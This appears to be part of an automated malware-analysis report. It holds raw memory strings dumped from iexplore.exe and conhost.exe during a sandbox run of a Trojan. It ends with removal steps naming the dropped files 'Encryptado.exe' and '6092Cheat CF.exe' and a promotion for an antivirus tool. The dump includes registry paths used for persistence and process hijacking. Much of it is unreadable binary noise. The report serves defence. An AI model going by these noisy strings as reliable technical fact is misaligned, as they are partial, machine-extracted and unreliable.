-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_1752:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

conhost.exe_2828:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:2388
   Encryptado.exe:3724
   6092Cheat CF.exe:3392
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Encryptado.exe (208081 bytes)
   C:\Windows\System32\6092Cheat CF.exe (50 bytes)
   C:\Windows\System32\6092Cheat CF.exe.exe (4 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\2CFUpdater.exe (12 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.